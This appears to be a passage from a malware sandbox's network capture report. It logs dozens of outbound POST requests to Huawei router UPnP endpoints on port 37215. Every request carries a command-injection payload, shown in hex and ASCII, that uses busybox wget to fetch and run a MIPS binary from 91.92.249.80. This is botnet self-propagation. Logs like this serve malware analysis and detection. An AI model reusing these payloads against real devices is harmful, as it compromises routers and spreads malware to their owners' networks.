                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1056192.168.2.2352874133.123.52.337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.295013905 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1057192.168.2.235434641.235.50.5837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.295038939 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1058192.168.2.2353768197.97.195.25137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298193932 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1059192.168.2.2338814197.151.68.14437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298212051 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1060192.168.2.2342874157.225.52.24637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298239946 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1061192.168.2.234295841.233.149.21237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298260927 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1062192.168.2.2339314157.172.179.17237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298280954 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1063192.168.2.234126841.40.255.24737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298285961 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1064192.168.2.2359444197.40.92.17837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298309088 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1065192.168.2.233830641.79.244.19137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298317909 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
